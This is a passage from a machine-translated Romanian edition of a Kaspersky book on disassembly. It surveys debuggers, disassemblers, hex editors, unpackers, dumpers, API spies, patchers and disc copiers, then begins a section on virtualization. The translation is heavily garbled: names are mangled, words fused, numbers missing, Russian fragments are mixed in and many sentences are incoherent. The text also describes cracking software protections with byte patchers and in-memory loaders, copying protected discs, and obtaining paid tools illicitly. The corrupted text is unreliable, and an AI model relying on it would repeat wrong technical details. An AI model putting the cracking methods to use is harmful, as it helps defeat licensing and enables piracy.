Chris Kaspersky, Eva Rocco, BU ® IA DMSH -Semlirias Prezentare generală a instrumentelor de hackeri pentru tehniciWindows și Linux pentru a lucra cu debuggeri și Dizassemblers Dizassembing practic și identificarea limbilor de nivelînalt și a metodelor de ocolire C G Art of DizAssembbing © Kaspersky K , Rocco E , © Înregistrare, editură „BHV-Petersburg”, Recunoștința față de Chris Kaspersky Eve Rocco Group of Training of the Publication: redactor-șefEkaterina Kondukova Editor -in -șef Natalya Tarkova Redactorii editorului Grigory Divan Olga Kokoreva Layout ComputerLayout Natalya Karavaeva corector Victoria Piotrovskaya Design de copertă Elena Belyaeva Producția cărții Nikolai TverCartea este dedicată problemelor și metodelor de dizassembing, a căror cunoștințe își vor proteja eficient programele șiva crea coduri software mai optimizate Sunt explicate metodele de identificare a limbilor de nivel ridicat, cum ar fiC/C ++ și Pascal, sunt prezentate diverse abordări ale reconstrucției algoritmilor O recenzie a instrumentelor popularede hacker pentru Windows, UNIX și Linux- Debugggers, DizAssemblers, editori hexadecimali, spioni ARI și RPC,emulatori Este luat în considerare studiul depozitelor de memorie, mecanisme de protecție, cod software rău intenționat- viruși și exploatări Se acordă atenție pentru combaterea tehnicilor anti -cy Descrierea CD -urilor pe CD -uri vețigăsi materiale însoțitoare concepute pentru a ajuta la dezvoltarea principiilor DizAssembing și Cod Research Materialelepentru fiecare capitol sunt grupate în funcție de folderele numerotate de numerele capitolelor, respectiv Conținutulfiecărui folder este următorul: □ Folder cu liste cuibărit - Listele și depozitele dezasamblate, numerotate în ordineacorespunzătoare numerotării înregistrărilor din capitol □ Dosarul SRC investit este codul de aplicație original șiexemple luate în considerare în carte □ Folder suplimentar cuibărit - Materiale suplimentare la capitolulcorespunzător Scanarea și traducerea cărții în formatul BJVU a fost susținută de versiunea electronică PVLTSI a acesteicărți este destinată exclusiv în scopuri educaționale!Introducerea cărții pe care o țineți acum în mâinile voastredeschide ușa către lumea uimitoare a inversării (dezvoltarea inversă) a mecanismelor de protecție Este adresat tuturorcelor care iubesc puzzle -urile și este gata să facă primii pași pe pugs pentru a deveni un adevărat hacker Pentru toțicei care petrec un timp gratuit (și fără probleme) pentru săparea intestinelor programelor și a sistemului de operare Încele din urmă, toți cei care, prin genul activităților lor, sunt angajați (constant sau episodic) prin scrierea apărăriiși vor să știe să fie competentă și garantată pentru a rezista hackerilor omniprezenți Cartea este dedicată dezvoltăriiinversă - poate cel mai dificil dintre aspectele hackingului, deoarece Dizassemping este arta, cu toate acestea, autoriiau depus eforturi maxime pentru structurarea materialului, astfel încât prezentarea a fost construită logic, iarcititorul, stăpânind arta de dizassembing, se deplasează „de la simplu la complex” La începutul cărții, sunt prezentatefundamentele de bază ale hacking-ului- tehnica de a lucra cu debuggeri, dizassemblers, editori hexadecimali, spații Ari-și RPC, emulatoare Este prezentată o imagine de ansamblu a instrumentelor populare de hacker pentru Windows, UNIX șiLinux și tehnici practice pentru lucrul cu debuggeri populari (Softice, Ollydbg, Windbg), de la cele cunoscute pe scarălargă până la cele care nu sunt tradiționale Tehnicile de identificare și reconstrucție a structurilor cheie alelimbajului original - funcții (inclusiv virtuale), variabile locale și globale, ramuri, cicluri, obiecte și ierarhiilelor, operatorii matematici etc , sunt descrise în detaliu, diverse abordări ale analizei analizei Dintre algoritmulstudiat sunt demonstrate în acest sens Programele explică cum să nu te pierzi în megabytesul codului dezasamblat și săevite o varietate de capcane viclene Se acordă o atenție semnificativă unor subiecte atât de importante precumreconstrucția algoritmilor activității mecanismelor de protecție, identificarea structurilor cheie ale limbilor cu nivelînalt, cum ar fi C/C ++ și Pascal Sunt luate în considerare metode practice de depășire a tehnicilor anti -deliere,tehnica de eliminare a depozitării din aplicații protejate, depășirea pachetelor și protectoarelor În exemple practice,sunt demonstrate metode de analiză a codului programelor și exploatării rău intenționate Subiecte atât de importanteprecum contracararea tehnicilor anti -deliere, studiul codului ambalat, criptat și confuz intenționat (obfuscat), precumși alte tehnologii care fac ca hackerii să fie dezavantajați în materie de dize și otrăvire Partea I Recenzie aprogramelor de hacker Capitolul Instrumente de hacker Ce începe hackerul?niste Ei vor spune - din studiul C/C ++, limbajul asamblatorului, predarea artei depanicării și a dizassembing -ului și vaavea dreptate Alții vor adăuga la această „Lista domnului” studiul arhitecturii diferitelor sisteme de operare,protocoale de rețea și căutarea vulnerabilităților Și vor avea dreptate Dar, pe de altă parte - și datorită a ceea cehackerii obțin rezultate?Așa este, din cauza cunoștințelor și a muncii grele Dar, în același timp, nu numai că lucreazăcu mâinile și capul, dar folosesc și instrumente de hacker Și selecția corectă a programelor este foarte importantă,deoarece ei sunt cei care formează conștiință, permițând începătorului să facă primii pași în pădurea densă a codurilorde mașini Acesta este doar aceste programe atât de mult încât începătorul care a ajuns pentru prima dată pe site -ulhacker este complet în pierdere - ce să descarce și ce nu merită să fie atentă Obiectivul principal al acestui capitoleste tocmai de a oferi o revizuire extrem de comprimată a software -ului hacker care acoperă aproape oricenevoi Rețineți, pe lângă încăpățânarea și dorința de a căuta în mod independent răspunsuri la întrebările care apar,motto -ul oricărui hacker ar trebui să fie expresia „cunoașteți -vă instrumentele” cu alte cuvinte, nu ar trebui să vămulțumiți doar cu o scurtă recenzie aici, Ceea ce este conceput doar pentru a vă atrage atenția asupra unui anumitprogram, de regulă, atât managementul utilizatorului, cât și acești lideri sunt furnizați cu aceste programe, esterecomandat cu tărie să studiați cu atenție debuggerii celor mai buni depanatori din toate timpurile și popoarele -aceasta, Desigur, este Softice, care a crescut mai mult de o generație de hackeri Acesta este un program interactiv cu ointerfață de comandă dezvoltată, care este un compromis între ușurința de dezvoltare și ușurința de utilizare (Fig ) Cu alte cuvinte, nu există nicio modalitate de a face fără a citi conducerea, mai ales că Softice nu oferă niciunmeniu intuitiv Numega, creată inițial de Softica a fost vândută de Compuware, care a distribuit -o de mult timp caparte a pachetului voluminos al Divertudio Framework Prin dezamăgire profundă, pe aprilie , din motive obscure,compania a anunțat încetarea lucrărilor asupra produsului, îngropând astfel proiectul unic Cea mai recentă versiune aDriverstudio acceptă întreaga linie Windows până la Server , precum și Arhitectură „Manual de utilizaresoftice” detaliat este aici în traducerea rusă aici http://www podgoretsky com/ftp/docs/softice/siug pdf În plus, unghid destul de scurt, dar foarte util pentru a utiliza Softice, care vă permite să începeți rapid să lucrați cu acestdepanator, poate fi găsit la http://www reconstructor org/papers/the% BIG% Softice% howto PDF Partea i Prezentaregenerală a programelor de hacker AMD X - Adică, Softice ar trebui să mai aibă suficienți ani timp de cinci ani, iarhackerii vor veni cu ceva Orez Softice este un debugger orientat profesional pe care mai mulți generații de hackeriau crescut pentru a găsi Softice pe aproape orice site de hackeri (de exemplu, aici:http://www woodmann com/crackz/tools htm) Pentru a nu descărca întregul pachet Divertudio, puteți utiliza pachetulDemonix (http://reversing kulichki net) care conține doar softice scos din Driverstudio ѵ Construiți Acestpachet durează doar , MB Cu toate acestea, instalatorul conține erori, iar versiunea veche nu acceptă noile tendințeMicrosoft (deși merge bine sub Windows ) Împreună cu Softice, este recomandabil să instalați imediat ICEXT(http://sourceforge net/projects/icext) - o expansiune neoficială care permite depangerii de la majoritatea apărărilor,să mențină depozitele de memorie, să implice Kirillic Coding / , să suspende fluxurile și efectuați multe altealte sarcini importante (Fig ) Dacă IceExt refuză să pornească, ajustați următoarele taste din această ramură aregistrului de sistem: HKLM \ System \ CurrentControlset \ Services \ ntice: KdHeapSize (DWORD): x ;KDSTACKSIZE(DWORD): x O altă extensie neoficială pentru Softice, Icedump (http://programnierstools org/systeni/ fauls? File =icedump zip) știe, de asemenea, să facă multe lucruri utile și să completeze cu succes ICEXT (Fig ) În acestmoment, succesorul adecvat al lui Softice este revendicat de Debugger Syser Debugger Commercial Debugger, despre care vafi discutat puțin mai departe Dacă sunteți interesat de debuggerul sursei Eagle, atunci este posibil ca proiectul RastaRasta debugger (http://rrod droids-corp orp org/) să vă atragă atenția Capitolul Instrumentul hacker Fig Îndepărtarea gropii folosind ICEXT FIG Înlăturarea gropei folosind Partea I Revizuirea programelor dehackeri Fig Sysser Debugger Debugger pentru depanarea driverului termonuclear Capitolul Hacker , Apropo, Softicaînsuși funcționează excelent sub mașina virtuală VMware, pentru că este suficient să se adauge la fișierul deconfigurare cu extensia ? Următoarele două linii: paevm = true procesorl use = false Nota atunci când lucrați cu Softice la procesoare șiprocesoare cu mai multe modele cu suport de hiperthreading a remarcat, de asemenea, unele probleme (deși aparneregulat) Puteți elimina aceste probleme în cazul apariției lor adăugând cheia /OneCPU în fișierul boot ini În plusfață de Softice, există și alți debuggeri, din care mi -ar plăcea în primul rând să notez debuggerul OPU gratuit(http://www ollydbg de) Acesta este un instrument convenabil de nivel aplicat (Fig ), axat pe nevoile hackerilorcare acceptă mecanismul de plug-in (plug-in) și a adunat o întreagă comunitate în jurul său, care a scris multe extensiiși completări minunate care ascund Ollydbg de protecție Determinarea automată a punctului inițial de a intra într -unprogram ambalat care facilitează eliminarea trezurilor, etc Colecții bune de pluginuri pot fi găsite pe site -urilehttp://www wasm ru și http://www openrce org Cel mai recent (și încă în mare măsură experimental) debugger nuclear este,fără îndoială, Syser (http://www sysersoft com) Acest debugger a fost lansat de dezvoltatorii chinezi și se confruntă înprezent cu stadiul de dezvoltare și formare activă (Fig ) Așa cum am menționat deja puțin mai devreme, acestdepanator susține rolul succesorului lui Softice Cea mai recentă versiune a acestuia (ѵ , din mai )funcționează cu versiuni pe de biți ale Windows /XP/ /Vista și oferă, de asemenea, suport pentru procesoareSMP, hiperthreading și multi-core Destul de mulți programatori folosesc debuggerul Microsoft Windbg Nucleus, care faceparte din setul gratuit de instrumente de depanare (http://www microsoft com/whdc/devtools/debuging/debugstart mspx) Este destul de potrivit pentru hacking (Fig ) Cu toate acestea, majoritatea hackerilorcare sunt obișnuiți cu ecranul negru softice consideră că este incomod Orez Windbg Partea I Partea I Orevizuire a programelor de hacker ale DizAssemblers Există o singură dizassembler potrivită pentru o muncă profesionalăcu adevărat profesională-yua pro (http://www idapro com) Acest dizassembler are o consolă (Fig ) și o versiunegrafică (Fig ) DA Pro percepe un număr imens de formate de fișiere și multe tipuri de procesoare, care se ocupă cuușurință de codul by-by of Java și NET Virtual Machines, acceptă macro-uri, pluginuri și scripturi, conține un debuggerintegrat, funcționează sub MS-DOS, Windows, Linux (Fig ) și are o capacitate unică de a recunoaște numele funcțiilorde bibliotecă standard prin semnăturile lor Există mai multe versiuni ale IDA Pro - Free (Freeware), Standard (Standard)și Expand (Advanced) Versiunea gratuită a IDA Pro poate fi descărcată la http://www dirfile com/IDA PRO FREEWARE VERSION HTM Este adevărat, însă, este demn de remarcat faptul că versiunea gratuită, în comparație custandardul și extins, are dizabilități Dintre toate arhitecturile procesorului, doar x este acceptat, iar funcția de asprijini modulele conectate este pur și simplu absentă În ceea ce privește versiunile standard și extins, acestea, caorice software bun, sunt scumpe (deși dacă arătați bine în rețelele de foi, pot fi trase de acolo gratuit) Principalulavantaj al IDA Pro este că este un dizassembler interactiv, adică un instrument intelectual care vă permite să lucrațicu un fișier binar, să gândiți și să creați și nu un automat mut, înghitând programul studiat și scuipând un „finisat”Listarea dezasamblată, în care totul este dezasamblat incorect Orez Versiunea consolei IDA Pro Capitolul ChacerTranstary Fig Versiunea grafică a IDA Pro Fig IDA Pro sub Linux Partea I Revizuirea programelor de hackerîn cele mai recente versiuni ale IDA Pro a făcut anumite progrese în direcția fișierelor automate de despachetare șieliminarea obstacolelor O colecție impresionantă de pluginuri și scripturi poate fi găsită atât pe site -ul oficial,cât și pe site -ul http://www openrce org Produsele concurente nu rezistă la nicio comparație cu IDA Pro Cu toateacestea, oamenii agită în mod activ Dizassembler liber (acum abandonat) cu funcțiile debugger - w dasm(http://www wasm ru/baixado php?mode=tool&id= ) și, aparent, este satisfăcut ( Fig ) Orez WDASM DizAssemblerAlte DizAssemblers au și mai multe dizabilități și, prin urmare, nu sunt luate în considerare aici Singurul dintreaceste produse care merită referințe este motorul hackerului (http://patkov-site narod ru/lib html), care este undizassembler de lungimi care se răspândește în textele sursă și destinate încorporarii în diverse hacker Programeangajate în interceptarea funcțiilor, despachetarea automată, generarea de cod polimorf, etc Decompilarea decompilăriieste procesul de obținere a textului inițial al programului (sau ceva foarte mult pe acesta similar) dintr -un fișier binar În întregime, decompilarea este fundamental imposibilă, deoarece compilarea este unproces unidirecțional, cu o pierdere de date Cu toate acestea, decompilatorii există încă și își fac sarcina cudemnitate Mai multe informații despre despachetarea fișierelor, eliminarea treptelor și obstacolelor pot fi găsite înpartea V a acestei cărți Capitolul Hacker Instrumente pentru programele scrise pe Delphi și Borland Builderfolosind RTTI, este posibil să se restabilească structura inițială a claselor până la numele funcțiilor membrilor,precum și să reconstruiți formularele și să „calculați” adresele manipulatorilor din fiecare dintre elemente Săpresupunem că avem o casetă de dialog de înregistrare cu butonul OK și vrem să știm ce procedură citește numărul deserie și ce face cu ea Nu este nimic mai ușor!Luăm decompa gratuită acolo dede (http://programmerstools org/node/ ),decompunem programul și mergeți (Fig )!Pentru Visual Basic, există decompilere, dintre care cel mai bun este VBDecompiler de la GPCH (http://www vb-decompler org/index php psproducts) Alți de bază de bază, inclusiv VB Rezq(http://www vbrezq com/), vbde (http://programmerstools org/node/ ) și spitses decompler(http://programmerstools org/ node//node/ ) este de asemenea util pentru a pune în valiza hackerului Un interesdeosebit sunt decompilatorii de programe de instalare, deoarece multe verificări (la expirarea versiunii demo, pentrunumărul de serie sau fișierul cheie) sunt efectuate doar în faza de instalare Cel mai popular instalator esteinstalishield Există mulți decompilatori convenabili pentru el Iată doar câteva dintre ele: G „ InstallShield XUnpacker (http://programmerstools org/node/ ) g„ Windows Installshield Decompiler(http://programmerstools org/node/ ) g „ Intallshiiler http://programmerstools org/node/ ) p ISDCC(http://programmerstools org/node/ ) în ceea ce privește Java și platforma NET, atunci IDA RGR este remarcabil Dacănu aveți Hand Ida Pro, puteți utiliza decompilere specializate care pot fi găsite pe site-urile http://www crackklab ruși http://www wasm ru împreună cu Decompilers Fox Pro, Clipper și alte exotice Cu mult timp în urmă, editorii (editorihex) au reprezentat programe simple care nu puteau afișa doar fișiere binare sub formă hexadecimală și regula BAI ParteaI O revizuire a programelor de hacker la aceste adrese Cu toate acestea, în timp, au crescut de Dizassemblersîncorporate încorporate , asamblatori, calculatoare și funcții de căutare ale expresiilor obișnuite, predăAveam sălucrez cu blocuri, să recunosc diverse formate de fișiere și chiar să decriptez/criptați fragmente de cod sau date Îngeneral, s -au transformat într -un fel de cuțit elvețian cu șaisprezece lame Cel mai popular a fost Hiew(http://webhostkemtel ru/~sen) Până la versiunea (formate de susținere MZ/PE/NE/LE/ELF), a fost distribuit gratuit(Fig ) Este adevărat, însă, este demn de remarcat faptul că versiunile vechi și gratuite au posibilități suficienteși, de asemenea, conțin mult mai puține erori și erori Apropo, în loc de ei, editorul de disc al editorului de discNorton a fost adesea folosit Capitolul Instrumentele hackerului Fig Editor comercial Hex WinhexFig Editor comercial Hex Hex NEH Atelier Partea I Prezentare generală a programelor de hacker Un alt editorbun, nu numai inferior lui Hiew, dar chiar depășirea acestuia, este NTE (http://hte sourceforge net), răspândindu -se încodurile sursă în mod liber Spre deosebire de Hiew, acest lucru vă permite să alegeți o metodă de instrucțiuni deasamblare (dacă instrucțiunea poate fi asamblată în mai multe moduri) și, de asemenea, acceptă un sistem puternic deîncredere încrucișată care se apropie îndeaproape de versiunea gratuită a IDA Pro (Fig )Hackerii occidentali suntfoarte îndrăgostiți de SixtEal editori precum Winhex (http://www winhex com/winhex/index-m html) și nu Workshop(http://www bpsoft com) Este de neînțeles că au găsit atractiv în ele Nici Winhex (Fig ), nici atelier (Fig )nu conțin asamblatori sau dizassemble și este puțin probabil ca aceste funcții să apară în viitor Singura calitatepozitivă a acestor editori, care poate fi remarcată, este prezența unui controler de control și a summului hash (deexemplu, CRC , CRC , MD , SHA- ), care, în unele cazuri, este foarte convenabil Din ce în ce mai multe programe suntdistribuite din ce în ce mai multe în formă ambalată (sau protejate de protectori, ceea ce este și mai rău) Drepturmare, Dizassemble -ul direct al acestor programe devine imposibil În cele din urmă, întrucât mulți pacheți/trepteconțin tehnici anti -deliere, depanarea suferă și ele Încearcă să creeze un despacker universal Multe au fost întreprinse încă de pe vremea MS-DOS De fiecare dată, aceste încercări s -au încheiat într -un eșeccomplet, deoarece dezvoltatorii de apărare au venit cu un nou muck Cu toate acestea, majoritatea instrumentelor dehacker (IDA Pro, Ollydbg) includ unpackers universali care fac față unei protecții simple În ceea ce privește protecțiacomplexă, atunci, se confruntă cu unul dintre ei, hackerul este obligat să despacheteze fișierul securizat manual Înpartea V a acestei cărți, această problemă va fi luată în considerare mai detaliat Între timp, observăm că, atunci cândacelași Packer îl întâlnește pe hacker pentru a zecea oară la rând, el se așază pentru a scrie un despacker automat sausemi -automat pentru a -i facilita activitatea Colecțiile de astfel de utilități sunt colectate pe site -urilehttp://www exetools com/ unpackers htm, http://programmerstools org/taxonomy/ , http://www woodmann com/crackz/Packers htm Problema principală este că fiecare astfel de unpacker este conceput pentru o versiune strict definită aambalatorului/benzii de rulare și pur și simplu nu poate lucra cu alții!Cu cât învelișul/banda de rulare esteactualizat, cu atât este mai dificil să găsești un despacker adecvat, așa că este mai bine să te bazezi doar petine Apropo, înainte de a căuta un despacker, ar fi frumos să aflăm: Care este programul spart este deloc protejat?Acestlucru va ajuta peidul utilitar gratuit (http://peid has it), care conține o bază de semnătură imensă Deși acest programeste adesea greșit sau dă un rezultat vag, dar, cu toate acestea, este încă mai bine decât nimic deloc Dumers careelimină groapa dintr -un program de lucru sunt o metodă universală de despachetare, care vă permite să faceți fațăaproape oricărui ambalator și majoritatea benzilor Adevărat, nu a funcționat încă la groapa de pe groapa primită, astfelîncât astfel de depozite sunt recomandate doar pentru DizassMitting Programul rupt în acest fel poate funcționainstabil, scăzând periodic în cel mai crucial moment Ce dump -uri îți stau la dispoziție?Primul dintre utilitățileacestei clase (și cel mai penibil) a fost programul Procdump (http://www hitecity com/millenium/firemansam/ /html/procdump html) Затем появился дампер Lord РЕ (http://www softpedia com/get/Programming/ File-Editors/LordPE shtml),учитывающий горький опыт своего предшественника и способный Глава Инструментарийхакера сохранять дамп даже в тех случаях, Când antetul RE estedistorsionat în mod deliberat de protecție, iar accesul la unele pagini de memorie este absent (atributpage noaccess) Coroana evoluției a fost instrumentele Damper PE (Fig ), setul de bază al cărui livrare poate figăsit pe aproape orice server de hackeri, de exemplu, la WASM (http://www wasm ru/baixado php? mod = instrument și id = ) sau) sau pe cracklab (http://www cracklab ru/download php?action=get&n=mtul), iar actualizările proaspete se aflăpe site -ul „nativ” al proiectului http: //petools org ru/petools shtml Rețineți site -ul „nativ” al proiectului îșischimbă adesea adresa Orez Instrumentele PE-una dintre cele mai bune amortizoare de re-fișiere după îndepărtareadepozitelor trebuie să restaureze cel puțin tabelul de import și, uneori, tabelul elementelor mutate împreună cusecțiunea de resurse Tabelul de import este cel mai bine restaurat de celebrul utilitate de reconstrucție a importului,care, împreună cu utilitatea relox (restabilirea tabelului elementelor mutate) și minimul universal universal Unpacker,pot fi găsite la: http://wave prohosting com/ MACT/MAIN HTM Și iată o colecție de programe pentru restabilirea tabeluluide resurse: http://www wasm ru/ baixado php? Mod = instrument și id = Dacă niciuna dintre aceste utilități nu poateface față sarcinii sale, atunci probabil că programul de liant de resurse gratuite va ajuta: http://www setisoft com/en/redirect php? Dlid = Redactorii de resurse trebuie să editeze resurse în multe cazuri De exemplu, pentru a schimbatextul casetei de dialog, deblocați elementul de control, înlocuiți logo -ul, etc Formal, editorul de resurse esteinclus în fiecare comparator Windows, inclusiv Microsoft Visual Studio Iată doar părți I Revizuirea programelor dehacker după editarea resurselor fișierul devine adesea nefuncțional!Acest lucru se datorează faptului că editorul deresurse complet pentru astfel de sarcini este inadecvat!Razele editorului de hackeri au fost și rămân editorul deresurse comerciale de restaurare (http://www bome com/restrator), care poate aproape tot ce este necesar și chiar puținmai mult (Fig ) Dintre utilitățile gratuite, în primul rând, aș dori să notez editorul de resurse XN(http://www wilsonc demon co uk/dloresourceeditor htm), scris pe Delphi și distribuit în textele originale, care permitepentru a crește funcționalitatea programului Orez Editarea resurselor în Spionii Resurse Resource Editor a utilizatîn principal două tipuri de spioni de mesaje Windows și Ari-shpions Primul monitorizează trimiterea de mesaje și controale, cel de -al doilea - apelul funcțiilor ARI, inclusivfuncțiile exportate de bibliotecile dinamice furnizate împreună cu programul Spionajul este cel mai bun (și cel maiieftin - în sensul efortului și al timpului) un instrument care vă permite să aflați ce „respiră” programul protejat Unspion decent de mesaje, numit Spyxx exe, este inclus în furnizarea standard a Microsoft Visual Studio Un spion similarîn funcții, dar numai cu texte open source, se află la http://www catch net/software/winspy asp și complet gratuit(Fig ) De la Ari-shpions, cel mai bun este Kerberos (http://www wasm ru/baixado php?mode=tool&id= ) de la RustemFasikhov, care a preluat tastatura când restul spionilor au încetat să-l aranjeze (Fig Fig (Fig ) Cu toateacestea, ei nu se ceartă despre gusturi, iar mulți programatori folosesc utilitatea apispy (la fel de liberă caKerberos), care poate fi obținută la http://www internals com Cu toate acestea, orice debugger normal (de exemplu,Softice, Ollydbg) poate fi configurat astfel încât să îndeplinească funcțiile unui spion ari și să acționeze pe unșablon foarte selectiv care ne salvează de la vizionarea pliantelor cu mai multe kilometri generate de Kerberos șiAPLSPY Despre modul de realizare a acestui lucru va fi descris mai detaliat în capitolul Capitolul Instrumentele hackerului Fig Spionarea mesajelor Windows folosind un Fig Fig Winspy de utilitategratuită Ari-Spy Kerberos de la Rustem Fasikhov monitorizează pentru a afla ce fișiere sau sucursale aleregistrului sunt abordate de programul experimental, este suficient să utilizați Monitorul de fișiere Filemon exe (Fig ) și Regimon exe Registry Monitor (Fig ), respectiv Ambele utilități au fost scrise de legendarul cercetătordin subsolul Windows, Mark Russinovich, și de mult timp răspândit cu codurile sursă complet gratuite prin intermediulsite -ului non -profit http://www sysinternals com Cu toate acestea, în iunie , fondatorii acestui site MarkRussinovich și Bryce Cogswell au devenit angajați ai Microsoft Deși utilitățile lor promit să rămână liberi și săcontinue să fie gratuite doar pentru utilizatorii legali ai Windows, așa că, în grabă, să le descărcați în timp ce esteposibil (http://www microsoft com/technet/sysinternals/defaultmspx) Partea I Revizuirea programelor de hackerFig Monitorul Registrului lui Mark Rusinovich Capitolul Instrumentele de modificatori Hacker există douăabordări diametral opuse programelor de hacking Cel mai dificil (dar în același timp cel mai corect ideologic și cel maipuțin pedepsit) este crearea propriilor camere de închisoare, fișiere cheie, etc Analizând modul în care funcționeazăgeneratorul original, hackerul scrie exact același lucru Cu toate acestea, acest lucru este prea obositor, mai ales cămajoritatea protecției sunt neutralizate prin editarea mai multor octeți Dar nu puteți distribui un fișier dehacking Pentru aceasta pot da pe labe În plus, de regulă, fișierele executabile și DLL sunt prea greoaie, deci există oidee naturală - pentru a distribui nu fișierul hacked în sine, ci o listă de octeți cu adrese care trebuierezolvate Desigur, un utilizator obișnuit nu va corecta programul folosind Hiew, astfel încât automatizarea vine lasalvare Pentru a obține o listă de diferențe între fișierele originale și hacked va ajuta utilitatea FC EHE, care faceparte din kitul standard de aprovizionare Windows Pentru a face corecții la fișierul executabil sau DLL, este necesară outilitate, care poate fi scrisă în doar câteva minute Colecția de modificatori este deja gata de utilizare este aici:http://www wasm ru/baixado php?mode=tool&id= Situația este complicată dacă programul este ambalat sau protejat de obandă de rulare În acest caz, trebuie să fie editat deja în zbor, direct în RAM În acest scop, utilitățile PatcherProcess (http://www wasm ru/baixado php?mode=tool&id= ), RISC Process Patcher (http://www wasm ru/baixado php?mode =Instrument & id = ) sau * Abel * Seif Leaming Loader Generator (http://www wasm ru/baixado php?mode=tool&id= ) Acestdin urmă program diferă prin faptul că caută octeți corectați, nu în funcție de deplasările fixe, ci prin șabloaneobișnuite, ceea ce îi permite, în cele mai multe cazuri, să experimenteze producția unei noi versiuni ușor modificate aprogramului rupt (cu excepția cazului Modificările nu au afectat mecanismul de protecție) Copierii discurilor protejatepentru a copia discurile protejate nu sunt deloc într -un hackie, ci mult mai mult în pirat Cu toate acestea, toatălumea trebuie să se angajeze periodic în această activitate, astfel încât aceste programe nu vor fi de prisos O perechede cei mai buni redactori comercianți este, fără îndoială, alcool % (http://www alcohol-soft com) și Clonecd(http://www slysoft com/en/clonecd html) Instrumente de daemon de utilitate gratuite (http: //www daemon- Tools cc) vă permite să montați imagini realizate de acești doi redactori ca discuri virtuale, ale căror imagini se aflăpe HDD Foarte confortabil!Capitolul Emule de debuggeri și emulatori în urmă cu câțiva ani, principalele fonduri dehacker au fost Dizassemblers și Debuggkers Acum, emulatoarele sunt adăugate și la ei, care se deschid în fața codurilorsunt posibilități cu adevărat nelimitate, accesibile anterior doar companiilor mari, iar acum au apărut în arsenaluloricărui cercetător Ce sunt emulatoarele și ce oportunități se deschid?Informațiile introductive despre emulatoare înformă generală pot fi definite ca capacitatea programului sau a dispozitivului de a imita activitatea unui alt programsau a altui dispozitiv De exemplu, în epoca tranziției de la computere pe biți precum ZX Spectrum la un grav (la acelmoment) IVM RS HT/AT, dezvoltatori nostalgând care nu doreau să se despartă de echipamente vechi, au scrisEmulators Emule au apărut ca niște ciuperci după ploaie și au permis tuturor să joace jocurile lor preferate, analogiidirecte pentru care nu existau RS pe al -lea computer Zece ani mai târziu, povestea repetată: sistemele de operare alefamiliei Windows NT, care au devenit standardul de facto, au blocat accesul direct la echipament, iar % din jocuri aurefuzat imediat să înceapă (sau să piardă însoțirea sunetului) Răspunsul la acest lucru a fost apariția DOSBOX și aaltor emulatoare care au permis utilizatorilor să -și întoarcă timpul înapoi și să -și amintească de foștii lor tineri,care a avut loc pe coridoarele sângeroase ale Doom II Cu toate acestea, la MHz, chiar și vechiul vechi Aladdin amers la limită, cu un pasaj al personalului, ca să nu mai vorbim de jocuri mai serioase A fost neprofitabil să creștețiputerea-a fost mai ușor să cumpărați un computer vechi, să puneți MS-DOS pe el și să vă bucurați de jocuri fără plecăribruște ale unui emulator, jerks și frâne Ideea de a emula IVM RS pe Samam IVM RS nu s -a născut brusc și nu imediat, dara câștigat imediat locația hackerilor, a administratorilor de sistem și pur și simplu curioși Revizuirea istorică, înurma apariției conceptului de multitasking, a apărut ideea de virtualizare, nominalizată în de Gerald Popek, încomun cu Robert Goldberg (Robert Goldberg) și descrisă de aceștia în articolul „a treia generație formală Acm org/ / ) Pentru a rula mai multe sisteme de operare în același timp, procesorul trebuie să sprijinememoria virtuală și să aibă niveluri separate de privilegii convenite cu setul echipei Программа, называемая Мониторомвиртуальных машин (Virtual Machine Monitor, VMM), запускается на наивысшем уровне привилегий, перехватывает выполнениепривилегированных инструкций (пытающихся обратиться, например, к физической памяти или портам ввода/вывода) Глава Эмулирующие отладчики и эмуляторы и эмулирует их выполнение Instrucțiunileneprivilementate în această schemă sunt efectuate pe glanda „IKIV” fără pierderi de viteză În același timp, deoareceprocentul de instrucțiuni privilegiate este relativ mic, costurile copleșitoare pot fi complet neglijate Dintre toatecalculatoarele care existau la acea vreme, numai aceste criterii au răspuns doar IBM System/ și Motorola MS Peaceștia au fost implementați emulatori eficienți care permit, în special, să creeze servere virtuale care servescutilizatori diferiți sau pur și simplu să se dubleze reciproc În cazul unui eșec brusc al unuia dintre servere,inițiativa îl ridică imediat pe celălalt, iar pentru aceasta nu este necesar să păstrați mai multe serverefizice!Rețineți că eșecul serverului în sine nu este luat în considerare, deoarece defecțiunile în funcționareasistemelor de operare apar mult mai des decât defecțiunile echipamentului Dar ce zici de procesoarele familiei Intel ?Aceștia susțin memoria virtuală și împărțirea privilegiilor în patru inele de protecție Ce îi împiedică săimplementeze un emulator cu drepturi complete pe ei, cum pe IBM System/ ?Din păcate, calculatoarele clasei de fier Bigsunt, prin urmare, apreciate că designerii lor și -au abordat sarcina cu atenție și gânditoare!Dar nu puteți spune acestlucru despre IBM RS Pentru început, toate sistemele de operare disponibile pe IVM ale RS sunt plasate în nucleele lor îninelul zero (inelul ), la care nu se aplică conceptul de comenzi privilegiate Prin urmare, monitorul mașinilor virtualenu le mai poate intercepta Adevărat, există o lacună - instalăm un anumit sistem de operare, declarând -o de bază sauprincipală (gazdă) și lansăm toate celelalte sisteme de operare din al treilea inel (inelul ) Apoi, instrucțiunileprivilegiate vor genera excepții ușor interceptate de monitorul mașinilor virtuale care funcționează în inelul zero Cutoate acestea, chiar și aici nu totul este atât de ușor pe cât pare!Instrucțiuni LGDT, LLDT și LIDT, Descărcarearegistrelor interne ale procesorului Indicatorii pentru tabelele globale și locale ale descriptorilor segmentelor și întreruperilor nu sunt complet adaptațipentru a lucra simultan cu mai multe sisteme de operare, deoarece GDT (Tabelul Descriptor Global), LDT (Tabeluldescriptor local) și IDT (Tabelul Descriptor de întrerupere) există în singurul specimen Tabelele descriptorilorsegmentelor stochează adrese și atribute liniare ale fiecăruia dintre segmente, iar descriptorul este un număr de biți încărcat în registrul segmentat CS, DS, SS, etc Cu tabelul Descriptorilor de întrerupere-aceeași imagine Sistemulde operare pentru oaspeți nu poate utiliza tabelele „master” ale descriptorilor din simplul motiv că selectorii deregistre de segmentare sunt redactați în interiorul sistemului de operare în sine Astfel, dacă Windows încarcă unselector H în registrul DS (și într -adevăr o face), nu este clar ce să faci tuturor celorlalte sisteme deoperare Există o singură cale de ieșire - pentru fiecare dintre mașinile virtuale, creați o copie separată a tabelelorDeskriptors, schimbându -le la trecerea de la o mașină virtuală la alta, ceea ce afectează serios performanța Dar astaeste!Instrucțiunile SGDT/SLDT și SIDT, citind valorile registrelor interne ale procesorului, nu sunt privilegiate, caurmare a cărei sisteme de operare a invitatului citește descriptorii sistemului de operare principal în loc de propriulsău!Același lucru este valabil și pentru instrucțiunile SMSW, citind sensul cuvântului de comandă al 